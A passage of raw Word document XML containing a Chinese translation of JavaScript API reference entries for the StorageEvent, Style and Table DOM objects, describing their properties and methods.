        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象中，如果已经存在键</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>，则使用新的值替换对应的老值。如果为当前</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象的名为</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>的属性赋值</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>，则会隐式调用这个方法。这就是说，可以使用普通的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性的访问及赋值语法来代替显式地调用</w:t>
      </w:r>
      <w:r>
        <w:t>setItem()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="870" w:name="StorageEvent"/>
      <w:r>
        <w:t>StorageEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="870"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代代表客户端存储区的</w:t>
      </w:r>
      <w:r>
        <w:t>Storage</w:t>
      </w:r>
      <w:r>
        <w:t>对象（参见</w:t>
      </w:r>
      <w:r>
        <w:t>20.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）。如果多个窗口、标签或框架页面正在显示来自同一个源的文档，则这些窗口将有权限</w:t>
      </w:r>
      <w:r>
        <w:t>访问同一个存储区。如果一个窗口中的脚本改变了某个存储区的内容时，在其他共享访问这个存储区的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上都会触发一个存储事件。（注意，这个事件不会在造成这个改变的窗口触发。）存储事件将在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发，且不会冒泡，也没有可供取消的默认操作。与存储事件关联的对象是一个</w:t>
      </w:r>
      <w:r>
        <w:t>StorageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它的属性描述发生在存储区的改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性为刚设置或删除的键。如果整个存储区被</w:t>
      </w:r>
      <w:r>
        <w:t>Storage.clear()</w:t>
      </w:r>
      <w:r>
        <w:t>方法清空了，则这个属性（以及</w:t>
      </w:r>
      <w:r>
        <w:t>newValue</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ol</w:t>
      </w:r>
      <w:r>
        <w:t>dValue</w:t>
      </w:r>
      <w:r>
        <w:t>）将为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly any newValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>的新值。如果对应的键移除，则这个值将为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。在写作本书的时候，各浏览器的实现还只允许存储字符串值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly any oldValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>刚刚改变的键的旧值，如果这个键是新添加到存储区的，则这个值为</w:t>
      </w:r>
      <w:r>
        <w:t>nul l</w:t>
      </w:r>
      <w:r>
        <w:t>。在写作本书的时候，各浏览器的实现还只允许存储字符串值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Storage storageArea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性等同于接收这个事件的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorag</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>属性，指明哪个存储区发生了改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是改变了存储区的脚本所属的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="871" w:name="Style"/>
      <w:r>
        <w:t>Style</w:t>
      </w:r>
      <w:bookmarkEnd w:id="871"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</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Style</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean disabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>将这个属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>将禁用与这个＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素关联的样式表，将它设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>将重新启用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性反映了</w:t>
      </w:r>
      <w:r>
        <w:t>HTML media</w:t>
      </w:r>
      <w:r>
        <w:t>属性，指定了当前样式应用的媒体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean scoped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>HTML scoped</w:t>
      </w:r>
      <w:r>
        <w:t>属性出现在当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上，则此属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。在写作本书的时候，各浏览器还不支持这个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSStyleSheet sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素定义的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleSheet</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string title</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素都支持一个</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上设置这个属性后，用户将可以通过标题来选择样式表（作为一个替换样式表），指定的标题可能会以某种形式显示在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的用户界面上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>反映对</w:t>
      </w:r>
      <w:r>
        <w:t>应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML type</w:t>
      </w:r>
      <w:r>
        <w:t>属性。默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>"text/css"</w:t>
      </w:r>
      <w:r>
        <w:t>，一般不需要设置这个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="872" w:name="Table"/>
      <w:r>
        <w:t>Table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="872"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t>＞</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Table</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，它定义了若干方便的属性和方法来查询及修改表格的各个部分。这些方法及属性让表格操作更简单，不过它们的功能也可以使用核心</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>方法来复制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表格由段落（</w:t>
      </w:r>
      <w:r>
        <w:t>section</w:t>
      </w:r>
      <w:r>
        <w:t>）、行以及单元格组成。参见</w:t>
      </w:r>
      <w:r>
        <w:t>TableCell</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>TableRow</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>TableSection</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w:t>
      </w:r>
      <w:r>
        <w:t>Table</w:t>
      </w:r>
      <w:r>
        <w:t>元素也有一个</w:t>
      </w:r>
      <w:r>
        <w:t>summ</w:t>
      </w:r>
      <w:r>
        <w:t>ary</w:t>
      </w:r>
      <w:r>
        <w:t>属性，对应同名的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element caption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指代当前表格的＜</w:t>
      </w:r>
      <w:r>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，如果这个元素不存在则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly HTMLCollection rows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由当前表格中所有行对应的</w:t>
      </w:r>
      <w:r>
        <w:t>TableRow</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成的类数组对象。这包含在＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞以及＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签中定义的所有行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLCollection tBodies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由当前表格中所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞段落对应的</w:t>
      </w:r>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableSection tFoot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前表格的＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，如果不存在对应的元素则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableSection tHead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前表格的＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，如果不存在对应的元素则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</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Element createCaption()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回一个对应当前表格的＜</w:t>
      </w:r>
      <w:r>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果当前表格已经有一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:t>＞，这个方法将简单地返回它。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果当前表格没有＜</w:t>
      </w:r>
      <w:r>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:t>＞，则这个方法先创建一个新的（空）标题，将它插入表格，然后再返回它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableS</w:t>
      </w:r>
      <w:r>
        <w:t>ection createTBody()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，将它插入到表格中，并返回它。新元素将插入到表格的最后一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>tbody</w:t>
      </w:r>
      <w:r>
        <w:t>＞之后，或者插入到表格的结尾处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableSection createTFoot()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回代表当前表格中第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:r>
        <w:t>。如果当前表格已经有一个页脚，这个方法将简单地返回它。如果当前表格没有＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞，则这个方法先创建一个新的（空）＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞，将它插入表格，然后再返回它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TableSection creat</w:t>
      </w:r>
      <w:r>
        <w:t>eTHead()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回代表当前表格中第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>TableSection</w:t>
      </w:r>
      <w:r>
        <w:t>。如果当前表格已经有一个页眉，这个方法将简单地返回它。如果当前表格中没有＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞，则这个方法先创建一个新的（空）＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，将它插入表格，然后再返回它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void deleteCaption()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>移除当前表格的第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>caption</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，如果存在这样的元素的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void deleteRow(long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法从当前表格中删除指定位置的行。表格的各行按它们在文档源码中的出现顺序编号。＜</w:t>
      </w:r>
      <w:r>
        <w:t>thead</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞部分中的行与表格中其他行一起编号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void deleteTFoot()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>移除当前表格的第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>tfoot</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，如果存在这样的元素的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void deleteTHead()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
